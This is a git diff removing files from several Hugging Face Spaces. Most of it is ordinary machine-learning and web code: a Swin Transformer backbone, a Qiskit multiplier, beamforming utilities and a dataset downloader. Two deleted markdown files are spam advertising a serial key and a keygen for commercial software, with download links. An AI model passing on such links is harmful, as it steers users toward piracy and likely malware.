self.window_partition(img_mask) - mask_windows = mask_windows.view( - -1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, - float(-100.0)).masked_fill( - attn_mask == 0, float(0.0)) - else: - shifted_query = query - attn_mask = None - - # nW*B, window_size, window_size, C - query_windows = self.window_partition(shifted_query) - # nW*B, window_size*window_size, C - query_windows = query_windows.view(-1, self.window_size**2, C) - - # W-MSA/SW-MSA (nW*B, window_size*window_size, C) - attn_windows = self.w_msa(query_windows, mask=attn_mask) - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, - self.window_size, C) - - # B H' W' C - shifted_x = self.window_reverse(attn_windows, H_pad, W_pad) - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll( - shifted_x, - shifts=(self.shift_size, self.shift_size), - dims=(1, 2)) - else: - x = shifted_x - - if pad_r > 0 or pad_b: - x = x[:, :H, :W, :].contiguous() - - x = x.view(B, H * W, C) - - x = self.drop(x) - return x - - def window_reverse(self, windows, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - H (int): Height of image - W (int): Width of image - Returns: - x: (B, H, W, C) - """ - window_size = self.window_size - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, - window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - def window_partition(self, x): - """ - Args: - x: (B, H, W, C) - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - window_size = self.window_size - x = x.view(B, H // window_size, window_size, W // window_size, - window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous() - windows = windows.view(-1, window_size, window_size, C) - return windows - - 
-class SwinBlock(BaseModule): - """" - Args: - embed_dims (int): The feature dimension. - num_heads (int): Parallel attention heads. - feedforward_channels (int): The hidden dimension for FFNs. - window_size (int, optional): The local window scale. Default: 7. - shift (bool, optional): whether to shift window or not. Default False. - qkv_bias (bool, optional): enable bias for qkv if True. Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - drop_rate (float, optional): Dropout rate. Default: 0. - attn_drop_rate (float, optional): Attention dropout rate. Default: 0. - drop_path_rate (float, optional): Stochastic depth rate. Default: 0. - act_cfg (dict, optional): The config dict of activation function. - Default: dict(type='GELU'). - norm_cfg (dict, optional): The config dict of normalization. - Default: dict(type='LN'). - with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - init_cfg (dict | list | None, optional): The init config. - Default: None. 
- """ - - def __init__(self, - embed_dims, - num_heads, - feedforward_channels, - window_size=7, - shift=False, - qkv_bias=True, - qk_scale=None, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0., - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - init_cfg=None): - - super(SwinBlock, self).__init__() - - self.init_cfg = init_cfg - self.with_cp = with_cp - - self.norm1 = build_norm_layer(norm_cfg, embed_dims)[1] - self.attn = ShiftWindowMSA( - embed_dims=embed_dims, - num_heads=num_heads, - window_size=window_size, - shift_size=window_size // 2 if shift else 0, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop_rate=attn_drop_rate, - proj_drop_rate=drop_rate, - dropout_layer=dict(type='DropPath', drop_prob=drop_path_rate), - init_cfg=None) - - self.norm2 = build_norm_layer(norm_cfg, embed_dims)[1] - self.ffn = FFN( - embed_dims=embed_dims, - feedforward_channels=feedforward_channels, - num_fcs=2, - ffn_drop=drop_rate, - dropout_layer=dict(type='DropPath', drop_prob=drop_path_rate), - act_cfg=act_cfg, - add_identity=True, - init_cfg=None) - - def forward(self, x, hw_shape): - - def _inner_forward(x): - identity = x - x = self.norm1(x) - x = self.attn(x, hw_shape) - - x = x + identity - - identity = x - x = self.norm2(x) - x = self.ffn(x, identity=identity) - - return x - - if self.with_cp and x.requires_grad: - x = cp.checkpoint(_inner_forward, x) - else: - x = _inner_forward(x) - - return x - - -class SwinBlockSequence(BaseModule): - """Implements one stage in Swin Transformer. - - Args: - embed_dims (int): The feature dimension. - num_heads (int): Parallel attention heads. - feedforward_channels (int): The hidden dimension for FFNs. - depth (int): The number of blocks in this stage. - window_size (int, optional): The local window scale. Default: 7. - qkv_bias (bool, optional): enable bias for qkv if True. Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. 
- drop_rate (float, optional): Dropout rate. Default: 0. - attn_drop_rate (float, optional): Attention dropout rate. Default: 0. - drop_path_rate (float | list[float], optional): Stochastic depth - rate. Default: 0. - downsample (BaseModule | None, optional): The downsample operation - module. Default: None. - act_cfg (dict, optional): The config dict of activation function. - Default: dict(type='GELU'). - norm_cfg (dict, optional): The config dict of normalization. - Default: dict(type='LN'). - with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - init_cfg (dict | list | None, optional): The init config. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - feedforward_channels, - depth, - window_size=7, - qkv_bias=True, - qk_scale=None, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0., - downsample=None, - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - init_cfg=None): - super().__init__(init_cfg=init_cfg) - - if isinstance(drop_path_rate, list): - drop_path_rates = drop_path_rate - assert len(drop_path_rates) == depth - else: - drop_path_rates = [deepcopy(drop_path_rate) for _ in range(depth)] - - self.blocks = ModuleList() - for i in range(depth): - block = SwinBlock( - embed_dims=embed_dims, - num_heads=num_heads, - feedforward_channels=feedforward_channels, - window_size=window_size, - shift=False if i % 2 == 0 else True, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop_rate=drop_rate, - attn_drop_rate=attn_drop_rate, - drop_path_rate=drop_path_rates[i], - act_cfg=act_cfg, - norm_cfg=norm_cfg, - with_cp=with_cp, - init_cfg=None) - self.blocks.append(block) - - self.downsample = downsample - - def forward(self, x, hw_shape): - for block in self.blocks: - x = block(x, hw_shape) - - if self.downsample: - x_down, down_hw_shape = self.downsample(x, hw_shape) - return x_down, down_hw_shape, x, hw_shape - else: - 
return x, hw_shape, x, hw_shape - - -@BACKBONES.register_module() -class SwinTransformer(BaseModule): - """ Swin Transformer - A PyTorch implement of : `Swin Transformer: - Hierarchical Vision Transformer using Shifted Windows` - - https://arxiv.org/abs/2103.14030 - - Inspiration from - https://github.com/microsoft/Swin-Transformer - - Args: - pretrain_img_size (int | tuple[int]): The size of input image when - pretrain. Defaults: 224. - in_channels (int): The num of input channels. - Defaults: 3. - embed_dims (int): The feature dimension. Default: 96. - patch_size (int | tuple[int]): Patch size. Default: 4. - window_size (int): Window size. Default: 7. - mlp_ratio (int | float): Ratio of mlp hidden dim to embedding dim. - Default: 4. - depths (tuple[int]): Depths of each Swin Transformer stage. - Default: (2, 2, 6, 2). - num_heads (tuple[int]): Parallel attention heads of each Swin - Transformer stage. Default: (3, 6, 12, 24). - strides (tuple[int]): The patch merging or patch embedding stride of - each Swin Transformer stage. (In swin, we set kernel size equal to - stride.) Default: (4, 2, 2, 2). - out_indices (tuple[int]): Output from which stages. - Default: (0, 1, 2, 3). - qkv_bias (bool, optional): If True, add a learnable bias to query, key, - value. Default: True - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - patch_norm (bool): If add a norm layer for patch embed and patch - merging. Default: True. - drop_rate (float): Dropout rate. Defaults: 0. - attn_drop_rate (float): Attention dropout rate. Default: 0. - drop_path_rate (float): Stochastic depth rate. Defaults: 0.1. - use_abs_pos_embed (bool): If True, add absolute position embedding to - the patch embedding. Defaults: False. - act_cfg (dict): Config dict for activation layer. - Default: dict(type='GELU'). - norm_cfg (dict): Config dict for normalization layer at - output of backone. Defaults: dict(type='LN'). 
- with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - pretrained (str, optional): model pretrained path. Default: None. - convert_weights (bool): The flag indicates whether the - pre-trained model is from the original repo. We may need - to convert some keys to make it compatible. - Default: False. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - Default: -1 (-1 means not freezing any parameters). - init_cfg (dict, optional): The Config for initialization. - Defaults to None. - """ - - def __init__(self, - pretrain_img_size=224, - in_channels=3, - embed_dims=96, - patch_size=4, - window_size=7, - mlp_ratio=4, - depths=(2, 2, 6, 2), - num_heads=(3, 6, 12, 24), - strides=(4, 2, 2, 2), - out_indices=(0, 1, 2, 3), - qkv_bias=True, - qk_scale=None, - patch_norm=True, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0.1, - use_abs_pos_embed=False, - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - pretrained=None, - convert_weights=False, - frozen_stages=-1, - init_cfg=None): - self.convert_weights = convert_weights - self.frozen_stages = frozen_stages - if isinstance(pretrain_img_size, int): - pretrain_img_size = to_2tuple(pretrain_img_size) - elif isinstance(pretrain_img_size, tuple): - if len(pretrain_img_size) == 1: - pretrain_img_size = to_2tuple(pretrain_img_size[0]) - assert len(pretrain_img_size) == 2, \ - f'The size of image should have length 1 or 2, ' \ - f'but got {len(pretrain_img_size)}' - - assert not (init_cfg and pretrained), \ - 'init_cfg and pretrained cannot be specified at the same time' - if isinstance(pretrained, str): - warnings.warn('DeprecationWarning: pretrained is deprecated, ' - 'please use "init_cfg" instead') - self.init_cfg = dict(type='Pretrained', checkpoint=pretrained) - elif pretrained is None: - self.init_cfg = init_cfg - else: - raise TypeError('pretrained must be a str or None') - 
- super(SwinTransformer, self).__init__(init_cfg=init_cfg) - - num_layers = len(depths) - self.out_indices = out_indices - self.use_abs_pos_embed = use_abs_pos_embed - - assert strides[0] == patch_size, 'Use non-overlapping patch embed.' - - self.patch_embed = PatchEmbed( - in_channels=in_channels, - embed_dims=embed_dims, - conv_type='Conv2d', - kernel_size=patch_size, - stride=strides[0], - norm_cfg=norm_cfg if patch_norm else None, - init_cfg=None) - - if self.use_abs_pos_embed: - patch_row = pretrain_img_size[0] // patch_size - patch_col = pretrain_img_size[1] // patch_size - self.absolute_pos_embed = nn.Parameter( - torch.zeros((1, embed_dims, patch_row, patch_col))) - - self.drop_after_pos = nn.Dropout(p=drop_rate) - - # set stochastic depth decay rule - total_depth = sum(depths) - dpr = [ - x.item() for x in torch.linspace(0, drop_path_rate, total_depth) - ] - - self.stages = ModuleList() - in_channels = embed_dims - for i in range(num_layers): - if i < num_layers - 1: - downsample = PatchMerging( - in_channels=in_channels, - out_channels=2 * in_channels, - stride=strides[i + 1], - norm_cfg=norm_cfg if patch_norm else None, - init_cfg=None) - else: - downsample = None - - stage = SwinBlockSequence( - embed_dims=in_channels, - num_heads=num_heads[i], - feedforward_channels=int(mlp_ratio * in_channels), - depth=depths[i], - window_size=window_size, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop_rate=drop_rate, - attn_drop_rate=attn_drop_rate, - drop_path_rate=dpr[sum(depths[:i]):sum(depths[:i + 1])], - downsample=downsample, - act_cfg=act_cfg, - norm_cfg=norm_cfg, - with_cp=with_cp, - init_cfg=None) - self.stages.append(stage) - if downsample: - in_channels = downsample.out_channels - - self.num_features = [int(embed_dims * 2**i) for i in range(num_layers)] - # Add a norm layer for each output - for i in out_indices: - layer = build_norm_layer(norm_cfg, self.num_features[i])[1] - layer_name = f'norm{i}' - self.add_module(layer_name, layer) - - def 
train(self, mode=True): - """Convert the model into training mode while keep layers freezed.""" - super(SwinTransformer, self).train(mode) - self._freeze_stages() - - def _freeze_stages(self): - if self.frozen_stages >= 0: - self.patch_embed.eval() - for param in self.patch_embed.parameters(): - param.requires_grad = False - if self.use_abs_pos_embed: - self.absolute_pos_embed.requires_grad = False - self.drop_after_pos.eval() - - for i in range(1, self.frozen_stages + 1): - - if (i - 1) in self.out_indices: - norm_layer = getattr(self, f'norm{i-1}') - norm_layer.eval() - for param in norm_layer.parameters(): - param.requires_grad = False - - m = self.stages[i - 1] - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def init_weights(self): - logger = get_root_logger() - if self.init_cfg is None: - logger.warn(f'No pre-trained weights for ' - f'{self.__class__.__name__}, ' - f'training start from scratch') - if self.use_abs_pos_embed: - trunc_normal_(self.absolute_pos_embed, std=0.02) - for m in self.modules(): - if isinstance(m, nn.Linear): - trunc_normal_init(m, std=.02, bias=0.) 
- elif isinstance(m, nn.LayerNorm): - constant_init(m, 1.0) - else: - assert 'checkpoint' in self.init_cfg, f'Only support ' \ - f'specify `Pretrained` in ' \ - f'`init_cfg` in ' \ - f'{self.__class__.__name__} ' - ckpt = _load_checkpoint( - self.init_cfg.checkpoint, logger=logger, map_location='cpu') - if 'state_dict' in ckpt: - _state_dict = ckpt['state_dict'] - elif 'model' in ckpt: - _state_dict = ckpt['model'] - else: - _state_dict = ckpt - if self.convert_weights: - # supported loading weight from original repo, - _state_dict = swin_converter(_state_dict) - - state_dict = OrderedDict() - for k, v in _state_dict.items(): - if k.startswith('backbone.'): - state_dict[k[9:]] = v - - # strip prefix of state_dict - if list(state_dict.keys())[0].startswith('module.'): - state_dict = {k[7:]: v for k, v in state_dict.items()} - - # reshape absolute position embedding - if state_dict.get('absolute_pos_embed') is not None: - absolute_pos_embed = state_dict['absolute_pos_embed'] - N1, L, C1 = absolute_pos_embed.size() - N2, C2, H, W = self.absolute_pos_embed.size() - if N1 != N2 or C1 != C2 or L != H * W: - logger.warning('Error in loading absolute_pos_embed, pass') - else: - state_dict['absolute_pos_embed'] = absolute_pos_embed.view( - N2, H, W, C2).permute(0, 3, 1, 2).contiguous() - - # interpolate position bias table if needed - relative_position_bias_table_keys = [ - k for k in state_dict.keys() - if 'relative_position_bias_table' in k - ] - for table_key in relative_position_bias_table_keys: - table_pretrained = state_dict[table_key] - table_current = self.state_dict()[table_key] - L1, nH1 = table_pretrained.size() - L2, nH2 = table_current.size() - if nH1 != nH2: - logger.warning(f'Error in loading {table_key}, pass') - elif L1 != L2: - S1 = int(L1**0.5) - S2 = int(L2**0.5) - table_pretrained_resized = F.interpolate( - table_pretrained.permute(1, 0).reshape(1, nH1, S1, S1), - size=(S2, S2), - mode='bicubic') - state_dict[table_key] = table_pretrained_resized.view( 
- nH2, L2).permute(1, 0).contiguous() - - # load state_dict - self.load_state_dict(state_dict, False) - - def forward(self, x): - x, hw_shape = self.patch_embed(x) - - if self.use_abs_pos_embed: - h, w = self.absolute_pos_embed.shape[1:3] - if hw_shape[0] != h or hw_shape[1] != w: - absolute_pos_embed = F.interpolate( - self.absolute_pos_embed, - size=hw_shape, - mode='bicubic', - align_corners=False).flatten(2).transpose(1, 2) - else: - absolute_pos_embed = self.absolute_pos_embed.flatten( - 2).transpose(1, 2) - x = x + absolute_pos_embed - x = self.drop_after_pos(x) - - outs = [] - for i, stage in enumerate(self.stages): - x, hw_shape, out, out_hw_shape = stage(x, hw_shape) - if i in self.out_indices: - norm_layer = getattr(self, f'norm{i}') - out = norm_layer(out) - out = out.view(-1, *out_hw_shape, - self.num_features[i]).permute(0, 3, 1, - 2).contiguous() - outs.append(out) - - return outs diff --git a/spaces/ronvolutional/ai-pokemon-card/static/index.html b/spaces/ronvolutional/ai-pokemon-card/static/index.html deleted file mode 100644 index fc630011e4b2a1979a176b3f4fe8ba51050d5061..0000000000000000000000000000000000000000 --- a/spaces/ronvolutional/ai-pokemon-card/static/index.html +++ /dev/null @@ -1,84 +0,0 @@ - - - - - - This Pokémon Does Not Exist - - - - - - - - - -
      -
      -
      - AI generated creature - AI generated creature - AI generated creature -
      -

      This Pokémon
      Does Not Exist

      - -
      - - -
      -
      -

      - Each illustration is generated with AI using a ruDALL-E - model fine-tuned by Max Woolf. Over - 100,000 such models are hosted on Hugging Face for immediate use. -

      -

      Abilities and descriptions via Pokémon TCG Developers. Not affiliated with The Pokémon Company.

      -
      -
      -
      - -
      -
      -
      -
      -
      -
      -
      -
      - The words 'Hugging Face' in the style of the Pokémon logo - -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      - - - diff --git a/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md b/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md deleted file mode 100644 index 5d1843308d43988e8b9c22229e4592857ce98431..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Advanced Systemcare 9 Beta Serial Key


      Download Ziphttps://tinurll.com/2uzowS



      -
      - aaccfb2cb3
      -
      -
      -

diff --git a/spaces/rzimmerdev/lenet_mnist/src/downloader.py b/spaces/rzimmerdev/lenet_mnist/src/downloader.py deleted file mode 100644 index 6a48da9c1a4c01c4fdc647a2aa538cd2c682e9f7..0000000000000000000000000000000000000000 --- a/spaces/rzimmerdev/lenet_mnist/src/downloader.py +++ /dev/null @@ -1,50 +0,0 @@ -# Script to automatically download and cache datasets -# Usage: python downloader.py -# -# To learn more about the Cityscapes dataset, see: -# https://www.cityscapes-dataset.com/ -import os -import pip -from urllib.request import urlretrieve - - -def download_dataset(name='cityscapes', path='downloads/downloads'): - """Select one of the available and implemented dataset downloaders: - name=any(['cityscapes', 'mnist']) - """ - if name == 'cityscapes': - download_cityscapes(path) - elif name == "mnist": - download_mnist(path) - else: - raise NotImplementedError - - -def download_mnist(path="downloads/mnist"): - remote_files = {"train_images": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz", - "train_labels": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz", - "test_images": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz", - "test_labels": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz"} - if not os.path.exists(path): - os.makedirs(path) - - for file in remote_files.keys(): - if os.path.exists(path + "/" + file): - continue - - urlretrieve(remote_files[file], path + "/" + file) - - -def download_cityscapes(path='downloads/cityscapes'): - if hasattr(pip, 'main'): - pip.main(['install', 'cityscapesscripts']) - else: - raise EnvironmentError("pip is not installed") - print("Which dataset do you want to download?") - os.system("csDownload -l") - ds_name = input() - while ds_name not in ['gtFine_trainvaltest', 'gtFine_trainval', 'gtFine_test', - 'leftImg8bit_trainvaltest', 'leftImg8bit_trainval', 'leftImg8bit_test']: - print("Invalid dataset name. 
Please try again.") - ds_name = input() - os.system(f"csDownload {ds_name} -d {path}/{ds_name}") diff --git a/spaces/samyak152002/Quantumn-Multiplication/app.py b/spaces/samyak152002/Quantumn-Multiplication/app.py deleted file mode 100644 index f852cd8eabc893c39e1920c0dbc08d0a0545d16f..0000000000000000000000000000000000000000 --- a/spaces/samyak152002/Quantumn-Multiplication/app.py +++ /dev/null @@ -1,104 +0,0 @@ -import gradio as gr -from qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister -from qiskit import Aer, execute -from math import pi - -def createInputState(qc, reg, n, pie): - """ - Computes the quantum Fourier transform of reg, one qubit at - a time. - Apply one Hadamard gate to the nth qubit of the quantum register reg, and - then apply repeated phase rotations with parameters being pi divided by - increasing powers of two. - """ - qc.h(reg[n]) - for i in range(0, n): - qc.cp(pie / float(2**(i + 1)), reg[n - (i + 1)], reg[n]) - -def evolveQFTState(qc, reg_a, reg_b, n, pie, factor): - """ - Evolves the state |F(ψ(reg_a))> to |F(ψ(reg_a+reg_b))> using the quantum - Fourier transform conditioned on the qubits of the reg_b. - Apply repeated phase rotations with parameters being pi divided by - increasing powers of two. - """ - l = len(reg_b) - for i in range(0, n + 1): - if (n - i) > l - 1: - pass - else: - qc.cp(factor*pie / float(2**(i)), reg_b[n - i], reg_a[n]) - -def inverseQFT(qc, reg, n, pie): - """ - Performs the inverse quantum Fourier transform on a register reg. - Apply repeated phase rotations with parameters being pi divided by - decreasing powers of two, and then apply a Hadamard gate to the nth qubit - of the register reg. - """ - for i in range(0, n): - qc.cp(-1 * pie / float(2**(n - i)), reg[i], reg[n]) - qc.h(reg[n]) - -def add(reg_a, reg_b, circ, factor): - """ - Add two quantum registers reg_a and reg_b, and store the result in - reg_a. 
- """ - pie = pi - n = len(reg_a) - 1 - - # Compute the Fourier transform of register a - for i in range(0, n + 1): - createInputState(circ, reg_a, n - i, pie) - # Add the two numbers by evolving the Fourier transform |F(ψ(reg_a))> - # to |F(ψ(reg_a+reg_b))> - for i in range(0, n + 1): - evolveQFTState(circ, reg_a, reg_b, n - i, pie, factor) - # Compute the inverse Fourier transform of register a - for i in range(0, n + 1): - inverseQFT(circ, reg_a, i, pie) - -def quantum_multiply(multiplicand_in, multiplier_in): - multiplicand_in = multiplicand_in.strip() - multiplier_in = multiplier_in.strip() - - multiplicand = QuantumRegister(len(multiplicand_in)) - multiplier = QuantumRegister(len(multiplier_in)) - accumulator = QuantumRegister(len(multiplicand_in) + len(multiplier_in)) - cl = ClassicalRegister(len(multiplicand_in) + len(multiplier_in)) - d = QuantumRegister(1) - - circ = QuantumCircuit(accumulator, multiplier, multiplicand, - d, cl, name="qc") - - # Store bit strings in quantum registers - for i in range(len(multiplicand_in)): - if multiplicand_in[i] == '1': - circ.x(multiplicand[len(multiplicand_in) - i - 1]) - - for i in range(len(multiplier_in)): - if multiplier_in[i] == '1': - circ.x(multiplier[len(multiplier_in) - i - 1]) - - # Set the single-qubit register d to |1> so each add(multiplier, d, circ, -1) - # below actually decrements the multiplier - circ.x(d) - - multiplier_str = '1' - # Perform repeated addition until the multiplier - # is zero - while(int(multiplier_str) != 0): - add(accumulator, multiplicand, circ, 1) - add(multiplier, d, circ, -1) - for i in range(len(multiplier)): - circ.measure(multiplier[i], cl[i]) - result = execute(circ, backend=Aer.get_backend('qasm_simulator'), - shots=2).result().get_counts(circ.name) - multiplier_str = list(result.keys())[0] - - circ.measure(accumulator, cl) - result = execute(circ, backend=Aer.get_backend('qasm_simulator'), - shots=2).result().get_counts(circ.name) - - return list(result.keys())[0] - -iface = gr.Interface(quantum_multiply, inputs=["text", "text"], outputs="text") - -iface.launch() diff --git 
a/spaces/sasha/Draw-Me-An-Insect/README.md b/spaces/sasha/Draw-Me-An-Insect/README.md deleted file mode 100644 index e3baac89f780d45a6e9f3484b53809437e27c3be..0000000000000000000000000000000000000000 --- a/spaces/sasha/Draw-Me-An-Insect/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Draw Me an Insect -emoji: 🐞🖼 -colorFrom: red -colorTo: pink -sdk: gradio -sdk_version: 3.9.1 -app_file: app.py -pinned: false -duplicated_from: fffiloni/whisper-to-stable-diffusion ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js b/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js deleted file mode 100644 index cfbaeedb4f371dfb5fe157db545b364046fca3e1..0000000000000000000000000000000000000000 --- a/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js +++ /dev/null @@ -1,76 +0,0 @@ -// ==UserScript== -// @name Kelpy Codos -// @namespace https://github.com/Keldos-Li/Kelpy-Codos -// @version 1.0.5 -// @author Keldos; https://keldos.me/ -// @description Add copy button to PRE tags before CODE tag, for Chuanhu ChatGPT especially. 
-// Based on Chuanhu ChatGPT version: ac04408 (2023-3-22) -// @license GPL-3.0 -// @grant none -// ==/UserScript== - -(function () { - 'use strict'; - - function addCopyButton(pre) { - var code = pre.querySelector('code'); - if (!code) { - return; // 如果没有找到 元素,则不添加按钮 - } - var firstChild = code.firstChild; - if (!firstChild) { - return; // 如果 元素没有子节点,则不添加按钮 - } - var button = document.createElement('button'); - button.textContent = '\uD83D\uDCCE'; // 使用 📎 符号作为“复制”按钮的文本 - button.style.position = 'relative'; - button.style.float = 'right'; - button.style.fontSize = '1em'; // 可选:调整按钮大小 - button.style.background = 'none'; // 可选:去掉背景颜色 - button.style.border = 'none'; // 可选:去掉边框 - button.style.cursor = 'pointer'; // 可选:显示指针样式 - button.addEventListener('click', function () { - var range = document.createRange(); - range.selectNodeContents(code); - range.setStartBefore(firstChild); // 将范围设置为第一个子节点之前 - var selection = window.getSelection(); - selection.removeAllRanges(); - selection.addRange(range); - - try { - var success = document.execCommand('copy'); - if (success) { - button.textContent = '\u2714'; - setTimeout(function () { - button.textContent = '\uD83D\uDCCE'; // 恢复按钮为“复制” - }, 2000); - } else { - button.textContent = '\u2716'; - } - } catch (e) { - console.error(e); - button.textContent = '\u2716'; - } - - selection.removeAllRanges(); - }); - code.insertBefore(button, firstChild); // 将按钮插入到第一个子元素之前 - } - - function handleNewElements(mutationsList, observer) { - for (var mutation of mutationsList) { - if (mutation.type === 'childList') { - for (var node of mutation.addedNodes) { - if (node.nodeName === 'PRE') { - addCopyButton(node); - } - } - } - } - } - - var observer = new MutationObserver(handleNewElements); - observer.observe(document.documentElement, { childList: true, subtree: true }); - - document.querySelectorAll('pre').forEach(addCopyButton); -})(); diff --git a/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 
[VERIFIED].md b/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 [VERIFIED].md deleted file mode 100644 index ba5755364cc152da0d6d5131cf2dcaa646fac0b7..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 [VERIFIED].md +++ /dev/null @@ -1,6 +0,0 @@ -

      CounterPath eyeBeam Enhanced 1.5.19.4.51814


      Download Ziphttps://gohhs.com/2uEAmz



      - -CounterPath eyeBeam Enhanced v1.5.19.2.49847 keygen by Z.W.T Co.. CounterPath eyeBeam Enhanced 1.5.19.4.51814 . 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py b/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py deleted file mode 100644 index 5e4919abb49f2985192149452ed59663b4caf8bf..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py +++ /dev/null @@ -1,7 +0,0 @@ -import chainer.functions as F - - -def _subsamplex(x, n): - x = [F.get_item(xx, (slice(None, None, n), slice(None))) for xx in x] - ilens = [xx.shape[0] for xx in x] - return x, ilens diff --git a/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py b/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py deleted file mode 100644 index f3eccee4cf98b164f8eb9802bde3741ac23dc9dc..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py +++ /dev/null @@ -1,84 +0,0 @@ -import torch -from torch_complex import functional as FC -from torch_complex.tensor import ComplexTensor - - -def get_power_spectral_density_matrix( - xs: ComplexTensor, mask: torch.Tensor, normalization=True, eps: float = 1e-15 -) -> ComplexTensor: - """Return cross-channel power spectral density (PSD) matrix - - Args: - xs (ComplexTensor): (..., F, C, T) - mask (torch.Tensor): (..., F, C, T) - normalization (bool): - eps (float): - Returns - psd (ComplexTensor): (..., F, C, C) - - """ - # outer product: (..., C_1, T) x (..., C_2, T) -> (..., T, C, C_2) - psd_Y = FC.einsum("...ct,...et->...tce", [xs, xs.conj()]) - - # Averaging mask along C: (..., C, T) -> (..., T) - mask = mask.mean(dim=-2) - - # Normalized mask along T: (..., T) - if normalization: - # If assuming the tensor is padded with zero, the summation along - # the time axis is same regardless of the padding length. 
- mask = mask / (mask.sum(dim=-1, keepdim=True) + eps) - - # psd: (..., T, C, C) - psd = psd_Y * mask[..., None, None] - # (..., T, C, C) -> (..., C, C) - psd = psd.sum(dim=-3) - - return psd - - -def get_mvdr_vector( - psd_s: ComplexTensor, - psd_n: ComplexTensor, - reference_vector: torch.Tensor, - eps: float = 1e-15, -) -> ComplexTensor: - """Return the MVDR(Minimum Variance Distortionless Response) vector: - - h = (Npsd^-1 @ Spsd) / (Tr(Npsd^-1 @ Spsd)) @ u - - Reference: - On optimal frequency-domain multichannel linear filtering - for noise reduction; M. Souden et al., 2010; - https://ieeexplore.ieee.org/document/5089420 - - Args: - psd_s (ComplexTensor): (..., F, C, C) - psd_n (ComplexTensor): (..., F, C, C) - reference_vector (torch.Tensor): (..., C) - eps (float): - Returns: - beamform_vector (ComplexTensor)r: (..., F, C) - """ - # Add eps - C = psd_n.size(-1) - eye = torch.eye(C, dtype=psd_n.dtype, device=psd_n.device) - shape = [1 for _ in range(psd_n.dim() - 2)] + [C, C] - eye = eye.view(*shape) - psd_n += eps * eye - - # numerator: (..., C_1, C_2) x (..., C_2, C_3) -> (..., C_1, C_3) - numerator = FC.einsum("...ec,...cd->...ed", [psd_n.inverse(), psd_s]) - # ws: (..., C, C) / (...,) -> (..., C, C) - ws = numerator / (FC.trace(numerator)[..., None, None] + eps) - # h: (..., F, C_1, C_2) x (..., C_2) -> (..., F, C_1) - beamform_vector = FC.einsum("...fec,...c->...fe", [ws, reference_vector]) - return beamform_vector - - -def apply_beamforming_vector( - beamform_vector: ComplexTensor, mix: ComplexTensor -) -> ComplexTensor: - # (..., C) x (..., C, T) -> (..., T) - es = FC.einsum("...c,...ct->...t", [beamform_vector.conj(), mix]) - return es diff --git a/spaces/serhatderya/controlnet_v11_scribble_ui/app.py b/spaces/serhatderya/controlnet_v11_scribble_ui/app.py deleted file mode 100644 index 